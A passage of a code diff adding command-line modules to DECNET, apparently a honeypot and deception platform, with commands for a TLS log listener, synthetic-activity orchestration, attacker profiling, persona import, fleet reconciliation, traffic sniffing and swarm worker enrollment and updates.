         svc_table.add_column("Service", style="bold cyan")
         svc_table.add_column("Status")
         svc_table.add_column("PID", style="dim")
         for name, match_fn, _launch_args in registry:
             pid = _utils._is_running(match_fn)
             if pid is not None:
                 svc_table.add_row(name, "[green]UP[/]", str(pid))
             else:
                 svc_table.add_row(name, "[red]DOWN[/]", "—")
         console.print(svc_table)
     @app.command()
     def teardown(
         all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
         id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
     ) -> None:
         """Stop and remove deckies."""
         _require_master_mode("teardown")
         if not all_ and not id_:
             console.print("[red]Specify --all or --id <name>.[/]")
             raise typer.Exit(1)
         log.info("teardown command invoked all=%s id=%s", all_, id_)
         from decnet.engine import teardown as _teardown
         # NOTE(review): with both --all and --id, only the named decky is
         # passed to the engine, yet all services are killed below —
         # confirm this combination is intended.
         _teardown(decky_id=id_)
         log.info("teardown complete all=%s id=%s", all_, id_)
         if all_:
             _utils._kill_all_services()
--- a/decnet/cli/listener.py
+++ b/decnet/cli/listener.py
@@ -0,0 +1,58 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import asyncio
 import pathlib
 import signal
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
     """Attach the ``listener`` command to ``app``."""
     @app.command()
     def listener(
         bind_host: str = typer.Option(
             "0.0.0.0", "--host",  # nosec B104
             help="Bind address for the master syslog-TLS listener",
         ),
         bind_port: int = typer.Option(
             6514, "--port",
             help="Listener TCP port (RFC 5425 default 6514)",
         ),
         log_path: Optional[str] = typer.Option(
             None, "--log-path",
             help="RFC 5424 forensic sink (default: ./master.log)",
         ),
         json_path: Optional[str] = typer.Option(
             None, "--json-path",
             help="Parsed-JSON ingest sink (default: ./master.json)",
         ),
         ca_dir: Optional[str] = typer.Option(
             None, "--ca-dir",
             help="DECNET CA dir (default: ~/.decnet/ca)",
         ),
         daemon: bool = typer.Option(
             False, "--daemon", "-d",
             help="Detach to background as a daemon process",
         ),
     ) -> None:
         """Run the master-side syslog-over-TLS listener (RFC 5425, mTLS)."""
         from decnet.swarm import pki
         from decnet.swarm.log_listener import ListenerConfig, run_listener
         # Unset (or empty) options fall back to the documented defaults.
         if ca_dir:
             resolved_ca_dir = pathlib.Path(ca_dir)
         else:
             resolved_ca_dir = pki.DEFAULT_CA_DIR
         cfg = ListenerConfig(
             log_path=pathlib.Path(log_path or "master.log"),
             json_path=pathlib.Path(json_path or "master.json"),
             bind_host=bind_host,
             bind_port=bind_port,
             ca_dir=resolved_ca_dir,
         )
         if daemon:
             log.info("listener daemonizing host=%s port=%d", bind_host, bind_port)
             _utils._daemonize()
         log.info("listener command invoked host=%s port=%d", bind_host, bind_port)
         console.print(f"[green]Starting DECNET log listener on {bind_host}:{bind_port} (mTLS)...[/]")
         async def _main() -> None:
             # SIGTERM / SIGINT set the stop event handed to the listener.
             stop = asyncio.Event()
             loop = asyncio.get_running_loop()
             for signum in (signal.SIGTERM, signal.SIGINT):
                 try:
                     loop.add_signal_handler(signum, stop.set)
                 except (NotImplementedError, RuntimeError):  # pragma: no cover
                     # Handler could not be installed here; carry on without it.
                     continue
             await run_listener(cfg, stop_event=stop)
         try:
             asyncio.run(_main())
         except KeyboardInterrupt:
             pass
--- a/decnet/cli/orchestrator.py
+++ b/decnet/cli/orchestrator.py
@@ -0,0 +1,56 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
     """Attach the ``orchestrate`` command to ``app``."""
     @app.command(name="orchestrate")
     def orchestrate_cmd(
         interval: int = typer.Option(
             60, "--interval", "-i",
             help="Seconds between synthetic activity ticks",
         ),
         daemon: bool = typer.Option(
             False, "--daemon", "-d",
             help="Detach to background as a daemon process",
         ),
         llm: Optional[bool] = typer.Option(
             None, "--llm/--no-llm",
             help=(
                 "Enable / disable LLM enrichment of user-class file "
                 "bodies.  Default reads $DECNET_REALISM_LLM (any "
                 "non-empty value enables; 'off' / unset disables)."
             ),
         ),
     ) -> None:
         """Inject synthetic life (inter-decky traffic + file ops + email) into the fleet."""
         import asyncio
         from decnet.orchestrator import orchestrator_worker
         from decnet.web.dependencies import repo
         if daemon:
             log.info("orchestrator daemonizing interval=%d", interval)
             _utils._daemonize()
         # Tri-state flag: None means neither --llm nor --no-llm was given.
         if llm is None:
             llm_label = "default"
         elif llm:
             llm_label = "on"
         else:
             llm_label = "off"
         log.info("orchestrator starting interval=%d llm=%s", interval, llm_label)
         console.print(
             f"[bold cyan]Orchestrator starting[/] (interval: {interval}s)"
         )
         async def _serve() -> None:
             # The repository is initialised before the worker starts.
             await repo.initialize()
             await orchestrator_worker(repo, interval=interval, llm_enabled=llm)
         try:
             asyncio.run(_serve())
         except KeyboardInterrupt:
             console.print("\n[yellow]Orchestrator stopped.[/]")
--- a/decnet/cli/profiler.py
+++ b/decnet/cli/profiler.py
@@ -0,0 +1,35 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
     """Attach the ``profiler`` command to ``app``."""
     @app.command(name="profiler")
     def profiler_cmd(
         interval: int = typer.Option(
             30, "--interval", "-i",
             help="Seconds between profile rebuild cycles",
         ),
         daemon: bool = typer.Option(
             False, "--daemon", "-d",
             help="Detach to background as a daemon process",
         ),
     ) -> None:
         """Run the attacker profiler as a standalone microservice."""
         import asyncio
         from decnet.profiler import attacker_profile_worker
         from decnet.web.dependencies import repo
         async def _serve() -> None:
             # The repository is initialised before the worker starts.
             await repo.initialize()
             await attacker_profile_worker(repo, interval=interval)
         if daemon:
             log.info("profiler daemonizing interval=%d", interval)
             _utils._daemonize()
         log.info("profiler starting interval=%d", interval)
         console.print(f"[bold cyan]Profiler starting[/] (interval: {interval}s)")
         try:
             asyncio.run(_serve())
         except KeyboardInterrupt:
             console.print("\n[yellow]Profiler stopped.[/]")
--- a/decnet/cli/realism.py
+++ b/decnet/cli/realism.py
@@ -0,0 +1,112 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """``decnet realism ...`` — content-engine maintenance commands.
 After stage 5 of the realism migration, this is the only remaining
 CLI surface from the realism library / former emailgen.  ``decnet
 realism run`` does not exist (the orchestrator runs the unified
 worker via ``decnet orchestrate``); the only sub-command is
 ``import-personas``, which validates + installs the host-wide global
 persona pool consumed by fleet (MACVLAN/IPVLAN) and SWARM-shard
 deckies.
 Topology personas live on ``Topology.email_personas`` and are
 managed via the dashboard or the topology API; this command does
 not touch them.
 """
 from __future__ import annotations
 import json
 from pathlib import Path
 from typing import Optional
 import typer
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
     """Attach the ``realism`` sub-app and its ``import-personas`` command to ``app``."""
     realism_app = typer.Typer(
         name="realism",
         help=(
             "Maintain the realism content engine (persona pool import, "
             "future content-class tuning)."
         ),
     )
     app.add_typer(realism_app, name="realism")
     @realism_app.command("import-personas")
     def realism_import_personas(
         path: Path = typer.Argument(
             ..., exists=True, file_okay=True, dir_okay=False, readable=True,
             help="JSON file containing a list of EmailPersona objects",
         ),
         output: Optional[Path] = typer.Option(
             None, "--output", "-o",
             help=(
                 "Override the destination path.  Defaults to the canonical "
                 "global pool (DECNET_REALISM_PERSONAS, /etc/decnet/"
                 "email_personas.json, or ~/.decnet/email_personas.json)."
             ),
         ),
     ) -> None:
         """Validate + install a personas JSON file as the global pool.
         Use this when deploying with IMAP/POP3 services on fleet
         (MACVLAN/IPVLAN) or SWARM-shard mail deckies — those have no
         parent topology row, so they read this host-wide list.
         MazeNET topology mail deckies use ``Topology.email_personas``
         instead and this command does not touch them.
         """
         _require_master_mode("realism import-personas")
         from decnet.realism import personas_pool as global_pool
         from decnet.realism.personas import parse_personas
         try:
             raw = path.read_text(encoding="utf-8")
         except OSError as exc:
             console.print(f"[red]Cannot read {path}:[/] {exc}")
             raise typer.Exit(code=1) from exc
         try:
             payload = json.loads(raw)
         except json.JSONDecodeError as exc:
             console.print(f"[red]Invalid JSON in {path}:[/] {exc}")
             raise typer.Exit(code=1) from exc
         if not isinstance(payload, list):
             console.print(
                 f"[red]{path} must contain a JSON list of personas, "
                 f"got {type(payload).__name__}[/]"
             )
             raise typer.Exit(code=1)
         personas = parse_personas(payload)
         if not personas:
             console.print(
                 f"[red]No valid personas in {path}.[/] "
                 "Check the schema (name, email, role, tone, mannerisms)."
             )
             raise typer.Exit(code=1)
         if len(personas) < 2:
             console.print(
                 f"[yellow]Warning: only {len(personas)} valid persona(s) — "
                 "the worker requires at least 2 to send mail; importing "
                 "anyway in case more are added later.[/]"
             )
         dest = output or global_pool.resolve_path()
         # Report an unwritable destination the same way as an unreadable
         # source: a red message and exit code 1 instead of a traceback.
         try:
             dest.parent.mkdir(parents=True, exist_ok=True)
             dest.write_text(
                 json.dumps(
                     [p.model_dump(exclude_none=False) for p in personas],
                     indent=2,
                     ensure_ascii=False,
                 ),
                 encoding="utf-8",
             )
         except OSError as exc:
             console.print(f"[red]Cannot write {dest}:[/] {exc}")
             raise typer.Exit(code=1) from exc
         # The pool's cache is reset after the file is rewritten.
         global_pool.reset_cache()
         console.print(
             f"[green]Imported {len(personas)} personas to[/] {dest}"
         )
         if path != dest:
             log.info("realism import-personas src=%s dest=%s", path, dest)
--- a/decnet/cli/reconciler.py
+++ b/decnet/cli/reconciler.py
@@ -0,0 +1,63 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``reconcile`` command to the given Typer application."""

    @app.command(name="reconcile")
    def reconcile_cmd(
        once: bool = typer.Option(
            False,
            "--once",
            help="Run a single reconcile pass and exit (no daemon loop).",
        ),
        interval: int = typer.Option(
            30,
            "--interval",
            "-i",
            help="Seconds between reconcile passes (ignored with --once).",
        ),
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process (long-lived only).",
        ),
    ) -> None:
        """Converge fleet state across decnet-state.json, the DB, and docker."""
        # Heavy imports are deferred to call time, as in the rest of this CLI.
        import asyncio
        from decnet.web.dependencies import repo

        if not once:
            # Long-lived mode: hand control to the worker loop until Ctrl-C.
            from decnet.fleet.reconciler_worker import fleet_reconciler_worker

            if daemon:
                log.info("reconciler daemonizing interval=%d", interval)
                _utils._daemonize()

            log.info("reconciler starting interval=%d", interval)
            console.print(
                f"[bold cyan]Fleet reconciler starting[/] (interval: {interval}s)"
            )

            async def _serve() -> None:
                await repo.initialize()
                await fleet_reconciler_worker(repo, interval=interval)

            try:
                asyncio.run(_serve())
            except KeyboardInterrupt:
                console.print("\n[yellow]Reconciler stopped.[/]")
            return

        # Single-pass mode: --interval and --daemon are not consulted here.
        from decnet.fleet.reconciler import reconcile_once

        async def _single_pass() -> None:
            await repo.initialize()
            summary = await reconcile_once(repo)
            inserted = summary["inserted"]
            deleted = summary["deleted"]
            state_updated = summary["state_updated"]
            console.print(
                "[bold cyan]reconcile:[/] "
                f"inserted={inserted} "
                f"deleted={deleted} "
                f"state_updated={state_updated}"
            )

        asyncio.run(_single_pass())
--- a/decnet/cli/sniffer.py
+++ b/decnet/cli/sniffer.py
@@ -0,0 +1,32 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``sniffer`` command to the given Typer application."""

    @app.command(name="sniffer")
    def sniffer_cmd(
        log_file: str = typer.Option(
            DECNET_INGEST_LOG_FILE,
            "--log-file",
            "-f",
            help="Path to write captured syslog + JSON records",
        ),
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Run the network sniffer as a standalone microservice."""
        # Deferred imports keep CLI start-up cheap for unrelated commands.
        import asyncio
        from decnet.sniffer import sniffer_worker

        def _serve() -> None:
            # Blocks until the worker coroutine finishes or is interrupted.
            asyncio.run(sniffer_worker(log_file))

        if daemon:
            log.info("sniffer daemonizing log_file=%s", log_file)
            _utils._daemonize()

        log.info("sniffer starting log_file=%s", log_file)
        console.print(f"[bold cyan]Sniffer starting[/] → {log_file}")

        try:
            _serve()
        except KeyboardInterrupt:
            console.print("\n[yellow]Sniffer stopped.[/]")
--- a/decnet/cli/swarm.py
+++ b/decnet/cli/swarm.py
@@ -0,0 +1,347 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """`decnet swarm ...` — master-side operator commands (HTTP to local swarmctl)."""
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from . import utils as _utils
 from .utils import console
 def register(app: typer.Typer) -> None:
    """Build the ``swarm`` sub-application and mount it on *app*.

    The sub-commands are declared on ``swarm_app`` inside this function.
    """
    # no_args_is_help: a bare `decnet swarm` prints the help instead of erroring.
    swarm_app = typer.Typer(
        name="swarm",
        help="Manage swarm workers (enroll, list, decommission). Requires `decnet swarmctl` running.",
        no_args_is_help=True,
    )
    app.add_typer(swarm_app, name="swarm")
    @swarm_app.command("enroll")
    def swarm_enroll(
        name: str = typer.Option(..., "--name", help="Short hostname for the worker (also the cert CN)"),
        address: str = typer.Option(..., "--address", help="IP or DNS the master uses to reach the worker"),
        agent_port: int = typer.Option(8765, "--agent-port", help="Worker agent TCP port"),
        sans: Optional[str] = typer.Option(None, "--sans", help="Comma-separated extra SANs for the worker cert"),
        notes: Optional[str] = typer.Option(None, "--notes", help="Free-form operator notes"),
        out_dir: Optional[str] = typer.Option(None, "--out-dir", help="Write the bundle (ca.crt/worker.crt/worker.key) to this dir for scp"),
        updater: bool = typer.Option(False, "--updater", help="Also issue an updater-identity cert (CN=updater@<name>) for the remote self-updater"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL (default: 127.0.0.1:8770)"),
    ) -> None:
        """Issue a mTLS bundle for a new worker and register it in the swarm."""
        # POSTs the enrollment request to swarmctl, prints the identity it
        # returned and, with --out-dir, writes the PEM bundle(s) to disk.
        # Private keys are created with mode 0600 from the start so they are
        # never readable by other users, not even between write and chmod.
        import os as _os
        import pathlib as _pathlib

        def _write_private(path: _pathlib.Path, pem: str) -> None:
            # O_CREAT with 0o600 applies the restrictive mode at creation time.
            fd = _os.open(path, _os.O_WRONLY | _os.O_CREAT | _os.O_TRUNC, 0o600)
            with _os.fdopen(fd, "w") as fh:
                fh.write(pem)
            # A pre-existing file keeps its old mode, so tighten it explicitly.
            # Still best-effort (some filesystems cannot chmod), but no longer
            # silent: the operator must know if the key may be exposed.
            try:
                path.chmod(0o600)
            except OSError as exc:
                console.print(f"[yellow]Could not restrict permissions on {path}: {exc}[/]")

        body: dict = {"name": name, "address": address, "agent_port": agent_port}
        if sans:
            # Drop empty entries produced by stray commas or whitespace.
            body["sans"] = [s.strip() for s in sans.split(",") if s.strip()]
        if notes:
            body["notes"] = notes
        if updater:
            body["issue_updater_bundle"] = True

        resp = _utils._http_request("POST", _utils._swarmctl_base_url(url) + "/swarm/enroll", json_body=body)
        data = resp.json()

        console.print(f"[green]Enrolled worker:[/] {data['name']}  "
                      f"[dim]uuid=[/]{data['host_uuid']}  "
                      f"[dim]fingerprint=[/]{data['fingerprint']}")
        if data.get("updater"):
            console.print(f"[green]  + updater identity[/] "
                          f"[dim]fingerprint=[/]{data['updater']['fingerprint']}")

        if out_dir:
            target = _pathlib.Path(out_dir).expanduser()
            target.mkdir(parents=True, exist_ok=True)
            (target / "ca.crt").write_text(data["ca_cert_pem"])
            (target / "worker.crt").write_text(data["worker_cert_pem"])
            _write_private(target / "worker.key", data["worker_key_pem"])
            console.print(f"[cyan]Agent bundle written to[/] {target}")

            if data.get("updater"):
                # The updater identity goes in a sibling "<out-dir>-updater" directory.
                upd_target = target.parent / f"{target.name}-updater"
                upd_target.mkdir(parents=True, exist_ok=True)
                (upd_target / "ca.crt").write_text(data["ca_cert_pem"])
                (upd_target / "updater.crt").write_text(data["updater"]["updater_cert_pem"])
                _write_private(upd_target / "updater.key", data["updater"]["updater_key_pem"])
                console.print(f"[cyan]Updater bundle written to[/] {upd_target}")
                console.print("[dim]Ship the agent dir to ~/.decnet/agent/ and the updater dir to ~/.decnet/updater/ on the worker.[/]")
            else:
                console.print("[dim]Ship this directory to the worker at ~/.decnet/agent/ (or wherever `decnet agent --agent-dir` points).[/]")
        else:
            # NOTE(review): this command never prints the response body, so the
            # PEMs mentioned below are not shown to the operator here — confirm
            # whether the bundle should be emitted or --out-dir made mandatory.
            console.print("[yellow]No --out-dir given — bundle PEMs are in the JSON response; persist them before leaving this shell.[/]")
    @swarm_app.command("list")
    def swarm_list(
        host_status: Optional[str] = typer.Option(None, "--status", help="Filter by status (enrolled|active|unreachable|decommissioned)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
    ) -> None:
        """List enrolled workers."""
        # Fetches /swarm/hosts from swarmctl (optionally filtered by status)
        # and renders the rows as a table.
        from urllib.parse import urlencode

        # URL-encode the filter so a value containing '&', '#', spaces, etc.
        # cannot corrupt the query string or inject extra parameters.
        q = ("?" + urlencode({"host_status": host_status})) if host_status else ""
        resp = _utils._http_request("GET", _utils._swarmctl_base_url(url) + "/swarm/hosts" + q)
        rows = resp.json()
        if not rows:
            console.print("[dim]No workers enrolled.[/]")
            return

        table = Table(title="DECNET swarm workers")
        for col in ("name", "address", "port", "status", "last heartbeat", "enrolled"):
            table.add_column(col)
        for r in rows:
            # Missing or null fields render as blanks / em dashes.
            table.add_row(
                r.get("name") or "",
                r.get("address") or "",
                str(r.get("agent_port") or ""),
                r.get("status") or "",
                str(r.get("last_heartbeat") or "—"),
                str(r.get("enrolled_at") or "—"),
            )
        console.print(table)
    @swarm_app.command("check")
    def swarm_check(
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
    ) -> None:
        """Actively probe every enrolled worker and refresh status + last_heartbeat."""

        def _describe(detail) -> str:
            # Dict details show their "status" if truthy, else all k=v pairs;
            # a missing detail becomes an em dash; anything else is stringified.
            if isinstance(detail, dict):
                return detail.get("status") or ", ".join(f"{k}={v}" for k, v in detail.items())
            if detail is None:
                return "—"
            return str(detail)

        endpoint = _utils._swarmctl_base_url(url) + "/swarm/check"
        # Probing every worker can be slow, hence the explicit 60 s timeout.
        payload = _utils._http_request("POST", endpoint, timeout=60.0).json()
        results = payload.get("results", [])

        if json_out:
            console.print_json(data=payload)
            return
        if not results:
            console.print("[dim]No workers enrolled.[/]")
            return

        table = Table(title="DECNET swarm check")
        for heading in ("name", "address", "reachable", "detail"):
            table.add_column(heading)

        for entry in results:
            if entry.get("reachable"):
                mark = "[green]yes[/]"
            else:
                mark = "[red]no[/]"
            table.add_row(
                entry.get("name") or "",
                entry.get("address") or "",
                mark,
                _describe(entry.get("detail")),
            )
        console.print(table)
    @swarm_app.command("update")
    def swarm_update(
        host: Optional[str] = typer.Option(None, "--host", help="Target worker (name or UUID). Omit with --all."),
        all_hosts: bool = typer.Option(False, "--all", help="Push to every enrolled worker."),
        include_self: bool = typer.Option(False, "--include-self", help="Also push to each updater's /update-self after a successful agent update."),
        root: Optional[str] = typer.Option(None, "--root", help="Source tree to tar (default: CWD)."),
        exclude: list[str] = typer.Option([], "--exclude", help="Additional exclude glob. Repeatable."),
        updater_port: int = typer.Option(8766, "--updater-port", help="Port the workers' updater listens on."),
        dry_run: bool = typer.Option(False, "--dry-run", help="Build the tarball and print stats; no network."),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL."),
    ) -> None:
        """Push the current working tree to workers' self-updaters (with auto-rollback on failure)."""
        # Flow: resolve targets via swarmctl, tar the tree once, push to all
        # targets concurrently, then render one table row per worker.
        # Exit codes: 2 for an invalid --host/--all combination, 1 when no
        # worker matches --host or when any agent update did not return 200.
        import asyncio
        import pathlib as _pathlib
        from decnet.swarm.tar_tree import tar_working_tree, detect_git_sha
        from decnet.swarm.updater_client import UpdaterClient

        def _detail_text(body) -> str:
            # Summarise a response body for the "detail" column: prefer the
            # release SHA, then the error text. The shape is checked at every
            # step because error bodies may carry `detail` as a plain string
            # (or `release` as a non-dict), which previously raised
            # AttributeError and aborted the whole report.
            if not isinstance(body, dict):
                return ""
            release = body.get("release")
            if isinstance(release, dict) and release.get("sha"):
                return str(release["sha"])
            failure = body.get("detail")
            if isinstance(failure, dict):
                return str(failure.get("error") or "")
            return str(failure) if failure else ""

        if not (host or all_hosts):
            console.print("[red]Supply --host <name> or --all.[/]")
            raise typer.Exit(2)
        if host and all_hosts:
            console.print("[red]--host and --all are mutually exclusive.[/]")
            raise typer.Exit(2)

        base = _utils._swarmctl_base_url(url)
        resp = _utils._http_request("GET", base + "/swarm/hosts")
        rows = resp.json()
        if host:
            targets = [r for r in rows if r.get("name") == host or r.get("uuid") == host]
            if not targets:
                console.print(f"[red]No enrolled worker matching '{host}'.[/]")
                raise typer.Exit(1)
        else:
            # --all skips workers that have been decommissioned.
            targets = [r for r in rows if r.get("status") != "decommissioned"]
        if not targets:
            console.print("[dim]No targets.[/]")
            return

        tree_root = _pathlib.Path(root) if root else _pathlib.Path.cwd()
        sha = detect_git_sha(tree_root)
        console.print(f"[dim]Tarring[/] {tree_root} [dim]sha={sha or '(not a git repo)'}[/]")
        tarball = tar_working_tree(tree_root, extra_excludes=exclude)
        console.print(f"[dim]Tarball size:[/] {len(tarball):,} bytes")

        if dry_run:
            console.print("[yellow]--dry-run: not pushing.[/]")
            for t in targets:
                console.print(f"  would push to [cyan]{t.get('name')}[/] at {t.get('address')}:{updater_port}")
            return

        async def _push_one(h: dict) -> dict:
            # Never raises: any failure is recorded under "error" so one bad
            # worker cannot abort the pushes to the others.
            name = h.get("name") or h.get("uuid")
            out: dict = {"name": name, "address": h.get("address"), "agent": None, "self": None}
            try:
                async with UpdaterClient(h, updater_port=updater_port) as u:
                    r = await u.update(tarball, sha=sha)
                    out["agent"] = {"status": r.status_code, "body": r.json() if r.content else {}}
                    # The updater itself is only refreshed after a good agent update.
                    if r.status_code == 200 and include_self:
                        rs = await u.update_self(tarball, sha=sha)
                        out["self"] = {"status": rs.status_code, "body": rs.json() if rs.content else {}}
            except Exception as exc:  # noqa: BLE001
                out["error"] = f"{type(exc).__name__}: {exc}"
            return out

        async def _push_all() -> list[dict]:
            return await asyncio.gather(*(_push_one(t) for t in targets))

        results = asyncio.run(_push_all())

        table = Table(title="DECNET swarm update")
        for col in ("host", "address", "agent", "self", "detail"):
            table.add_column(col)
        any_failure = False
        for r in results:
            agent = r.get("agent") or {}
            selff = r.get("self") or {}
            # Guard against a row that had neither name nor uuid.
            row_name = str(r["name"] or "")
            err = r.get("error")
            if err:
                any_failure = True
                table.add_row(row_name, r.get("address") or "", "[red]error[/]", "—", err)
                continue

            a_status = agent.get("status")
            if a_status == 200:
                agent_cell = "[green]updated[/]"
            elif a_status == 409:
                agent_cell = "[yellow]rolled-back[/]"
                any_failure = True
            else:
                agent_cell = f"[red]{a_status}[/]"
                any_failure = True

            # NOTE(review): a non-200 self-update is shown in red but does not
            # set any_failure, so it does not affect the exit code — confirm
            # that this is intended.
            if not include_self:
                self_cell = "—"
            elif selff.get("status") == 200 or selff.get("status") is None:
                # An empty `selff` means the self-update was never attempted.
                self_cell = "[green]ok[/]" if selff else "[dim]skipped[/]"
            else:
                self_cell = f"[red]{selff.get('status')}[/]"

            detail = _detail_text(agent.get("body"))
            table.add_row(row_name, r.get("address") or "", agent_cell, self_cell, detail[:80])
        console.print(table)

        if any_failure:
            raise typer.Exit(1)
    @swarm_app.command("deckies")
    def swarm_deckies(
        host: Optional[str] = typer.Option(None, "--host", help="Filter by worker name or UUID"),
        state: Optional[str] = typer.Option(None, "--state", help="Filter by shard state (pending|running|failed|torn_down)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        json_out: bool = typer.Option(False, "--json", help="Emit JSON instead of a table"),
    ) -> None:
        """List deployed deckies across the swarm with their owning worker host."""
        # Resolves --host to a UUID via /swarm/hosts, queries /swarm/deckies
        # with the requested filters, and prints JSON or a table.
        # Exits 1 when --host matches no enrolled worker.
        from urllib.parse import urlencode

        base = _utils._swarmctl_base_url(url)
        host_uuid: Optional[str] = None
        if host:
            resp = _utils._http_request("GET", base + "/swarm/hosts")
            rows = resp.json()
            match = next((r for r in rows if r.get("uuid") == host or r.get("name") == host), None)
            if match is None:
                console.print(f"[red]No enrolled worker matching '{host}'.[/]")
                raise typer.Exit(1)
            host_uuid = match["uuid"]

        # Build the query with urlencode so operator-supplied filter values
        # are escaped rather than pasted into the URL verbatim.
        params: dict = {}
        if host_uuid:
            params["host_uuid"] = host_uuid
        if state:
            params["state"] = state
        path = "/swarm/deckies" + (("?" + urlencode(params)) if params else "")

        resp = _utils._http_request("GET", base + path)
        rows = resp.json()
        if json_out:
            console.print_json(data=rows)
            return
        if not rows:
            console.print("[dim]No deckies deployed.[/]")
            return

        table = Table(title="DECNET swarm deckies")
        for col in ("decky", "host", "address", "state", "services"):
            table.add_column(col)
        for r in rows:
            services = ",".join(r.get("services") or []) or "—"
            # A missing state is displayed as "pending".
            state_val = r.get("state") or "pending"
            # Unknown states fall through uncoloured.
            colored = {
                "running": f"[green]{state_val}[/]",
                "failed": f"[red]{state_val}[/]",
                "pending": f"[yellow]{state_val}[/]",
                "torn_down": f"[dim]{state_val}[/]",
            }.get(state_val, state_val)
            table.add_row(
                r.get("decky_name") or "",
                r.get("host_name") or "<unknown>",
                r.get("host_address") or "",
                colored,
                services,
            )
        console.print(table)
    @swarm_app.command("decommission")
    def swarm_decommission(
        name: Optional[str] = typer.Option(None, "--name", help="Worker hostname"),
        uuid: Optional[str] = typer.Option(None, "--uuid", help="Worker UUID (skip lookup)"),
        url: Optional[str] = typer.Option(None, "--url", help="Override swarm controller URL"),
        yes: bool = typer.Option(False, "--yes", "-y", help="Skip interactive confirmation"),
    ) -> None:
        """Remove a worker from the swarm (cascades decky shard rows)."""
        # Resolves the worker (by --uuid directly, else by --name through
        # /swarm/hosts), asks for confirmation unless --yes, then issues the
        # DELETE. Exits 2 when neither flag is given, 1 when the name is
        # unknown, 0 when the operator declines.
        from urllib.parse import quote

        if not (name or uuid):
            console.print("[red]Supply --name or --uuid.[/]")
            raise typer.Exit(2)

        base = _utils._swarmctl_base_url(url)
        target_uuid = uuid
        target_name = name
        # Falsy check (not `is None`) so an empty --uuid falls back to the
        # name lookup instead of producing a DELETE with an empty path segment.
        if not target_uuid:
            resp = _utils._http_request("GET", base + "/swarm/hosts")
            rows = resp.json()
            match = next((r for r in rows if r.get("name") == name), None)
            if match is None:
                console.print(f"[red]No enrolled worker named '{name}'.[/]")
                raise typer.Exit(1)
            target_uuid = match["uuid"]
            target_name = match.get("name") or target_name

        if not yes:
            # With only --uuid there is no name to show; avoid printing "None".
            label = f"{target_name!r} ({target_uuid})" if target_name else f"{target_uuid}"
            confirm = typer.confirm(f"Decommission worker {label}?", default=False)
            if not confirm:
                console.print("[dim]Aborted.[/]")
                raise typer.Exit(0)

        # Escape the identifier so a value containing '/', '?' or '#' cannot
        # redirect the DELETE to a different path.
        _utils._http_request("DELETE", f"{base}/swarm/hosts/{quote(str(target_uuid), safe='')}")
        console.print(f"[green]Decommissioned {target_name or target_uuid}.[/]")
--- a/decnet/cli/swarmctl.py
+++ b/decnet/cli/swarmctl.py
@@ -0,0 +1,113 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import os
 import signal
 import subprocess  # nosec B404
 import sys
 from typing import Optional
 import typer
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``swarmctl`` command to the given Typer application."""

    @app.command()
    def swarmctl(
        port: int = typer.Option(
            8770, "--port",
            envvar="DECNET_SWARMCTL_PORT",
            help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
        ),
        host: str = typer.Option(
            "127.0.0.1", "--host",
            envvar="DECNET_SWARMCTL_HOST",
            help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
        ),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
        no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
        tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
        cert: Optional[str] = typer.Option(None, "--cert", help="BYOC: path to TLS server cert (PEM). Auto-issues from the DECNET CA if omitted."),
        key: Optional[str] = typer.Option(None, "--key", help="BYOC: path to TLS server private key (PEM)."),
        client_ca: Optional[str] = typer.Option(None, "--client-ca", help="CA bundle used to verify worker client certs. Defaults to the DECNET CA."),
    ) -> None:
        """Run the DECNET SWARM controller (master-side, separate process from `decnet api`).
        By default, `decnet swarmctl` auto-spawns `decnet listener` as a fully-
        detached sibling process so the master starts accepting forwarder
        connections on 6514 without a second manual invocation. The listener
        survives swarmctl restarts and crashes — if it dies on its own,
        restart it manually with `decnet listener --daemon …`. Pass
        --no-listener to skip.
        Pass ``--tls`` to serve over HTTPS with mutual-TLS enforcement. By
        default the server cert is auto-issued from the DECNET CA under
        ``~/.decnet/swarmctl/`` so enrolled workers (which already ship that
        CA's ``ca.crt``) trust it out of the box. BYOC via ``--cert``/``--key``
